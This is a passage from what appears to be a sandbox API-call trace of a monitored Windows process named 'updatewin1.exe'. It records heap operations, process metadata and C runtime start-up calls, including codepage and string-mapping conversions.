hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a23b8 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a23e0 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2408 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2430 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2458 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2480 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a24a8 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a24d0 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a24f8 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2520 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2548 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2570 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2598 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a25c0 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2618 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2640 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2668 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2690 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a26b8 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a26e0 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2708 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2730 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2758 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2780 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a27a8 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a27d0 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a27f8 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2820 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2848 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2870 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2898 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a28c0 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a28e8 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2910 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2938 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2960 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2988 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a29b0 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a29d8 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2a00 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2a28 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2a50 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2a78 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2aa0 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a4e00 | out: hHeap=0x270000) returned 1 [0130.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29eaf8 | out: hHeap=0x270000) returned 1 [0130.755] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0130.755] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0130.755] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29a3e8 | out: hHeap=0x270000) returned 1 [0130.755] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29cdc8 | out: hHeap=0x270000) returned 1 [0130.755] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0130.755] GetLastError () returned 0x57 [0130.755] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f584 | out: phModule=0x18f584) returned 0 [0130.755] ExitProcess (uExitCode=0x0) [0130.755] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29ad00 | out: hHeap=0x270000) returned 1 [0130.756] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Process: id = "11" image_name = "updatewin1.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe" page_root = "0x51be7000" os_pid = "0x748" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xab0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe\" --Admin" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 120 os_tid = 0x844 [0130.758] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x58422070, dwHighDateTime=0x1d6bf06)) [0130.758] GetCurrentProcessId () returned 0x748 [0130.758] GetCurrentThreadId () returned 0x844 [0130.758] GetTickCount () returned 0x1153e49 [0130.758] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=25102285082) returned 1 [0130.758] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0130.758] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x590000 [0130.760] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.760] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0130.760] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0130.760] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0130.760] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0130.761] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.761] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.761] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.761] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.761] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.761] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.762] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.762] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.762] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.762] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.762] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.762] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.762] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.762] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.763] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.763] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0130.763] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x214) returned 0x5907d0 [0130.763] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.763] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0130.763] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.763] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.764] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0130.764] GetCurrentThreadId () returned 0x844 [0130.764] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0130.764] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x800) returned 0x5909f0 [0130.764] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0130.764] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0130.764] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0130.764] SetHandleCount (uNumber=0x20) returned 0x20 [0130.764] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe\" --Admin" [0130.764] GetEnvironmentStringsW () returned 0x5e4e78* [0130.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0130.765] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x565) returned 0x5911f8 [0130.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x5911f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0130.765] FreeEnvironmentStringsW (penv=0x5e4e78) returned 1 [0130.765] GetLastError () returned 0x0 [0130.765] SetLastError (dwErrCode=0x0) [0130.765] GetLastError () returned 0x0 [0130.765] SetLastError (dwErrCode=0x0) [0130.765] GetLastError () returned 0x0 [0130.765] SetLastError (dwErrCode=0x0) [0130.765] GetACP () returned 0x4e4 [0130.765] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x220) returned 0x591768 [0130.765] GetLastError () returned 0x0 [0130.765] SetLastError (dwErrCode=0x0) [0130.765] IsValidCodePage (CodePage=0x4e4) returned 1 [0130.765] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0130.765] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0130.765] GetLastError () returned 0x0 [0130.765] SetLastError (dwErrCode=0x0) [0130.765] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0130.765] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0130.765] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0130.766] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0130.766] GetLastError () returned 0x0 [0130.766] SetLastError (dwErrCode=0x0) [0130.766] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0130.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0130.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⟆躯㞕AĀ") returned 256 [0130.766] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⟆躯㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0130.766] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⟆躯㞕AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0130.766] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿD)¯\x80\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0130.766] GetLastError () returned 0x0 [0130.766] SetLastError (dwErrCode=0x0) [0130.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0130.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⟆躯㞕AĀ") returned 256 [0130.766] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⟆躯㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0130.766] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⟆躯㞕AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0130.766] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 